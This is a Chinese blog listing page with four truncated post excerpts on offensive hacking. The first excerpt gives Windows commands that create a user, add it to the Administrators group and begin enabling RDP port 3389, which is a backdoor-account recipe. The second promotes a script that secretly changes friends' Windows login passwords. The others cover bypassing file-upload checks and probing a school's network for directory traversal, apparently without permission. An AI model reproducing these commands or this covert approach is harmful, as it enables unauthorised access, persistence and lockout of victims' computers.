摘要: 1.创建用户chen Net user chen 1234566 /add 2.将用户chen添加到管理员组 net localgroup Administrators chen /add 3.开启3389端口 REG ADD HKLM\SYSTEM\CurrentControlSet\Contro 阅读全文
posted @ 2019-03-18 12:34 Python研究者 阅读(1965) 评论(0) 推荐(0) 编辑
摘要: 今天教大家用python脚本来控制小伙伴们windows电脑的开机密码。没错就是神不知鬼不觉,用random()随机生成的密码,只有你自己知道哦~ 代码呢分两部分,一部分是client端跟server端两个。你只需要想办法让小伙伴运行你的client端脚本就OK啦。不过在此之前你一定要在你的电脑上运 阅读全文
posted @ 2019-03-18 12:33 Python研究者 阅读(2032) 评论(0) 推荐(0) 编辑
摘要: 上传数据包 从数据包中可以看出,验证文件类型的参数有:Content-Type、Filename、Filedata。 客户端JS验证 原理介绍 通过JS验证上传文件类型是最不安全的做法,因为这个方式是最容易被绕过的。我们先来看下JS实现文件检测的代码如下: 客户端JS验证通常做法是验证上传文件的扩展 阅读全文
posted @ 2019-03-18 12:26 Python研究者 阅读(674) 评论(0) 推荐(0) 编辑
摘要: 某天比较无聊,听一个朋友推荐httpscan这款工具,于是就下载下来试试。 首先对某学校网段开始进行测试。 1 测试时发现有个比较特殊的标题。一般有这个,证明存在目录遍历。 目录遍历这个漏洞,说大也不大,说小也不小,但是,一般来说,存在这种目录,可以证明网站管理员比较粗心,当然也有可能会把一些敏感文 阅读全文
posted @ 2019-03-18 12:25 Python研究者 阅读(3352) 评论(0) 推荐(0) 编辑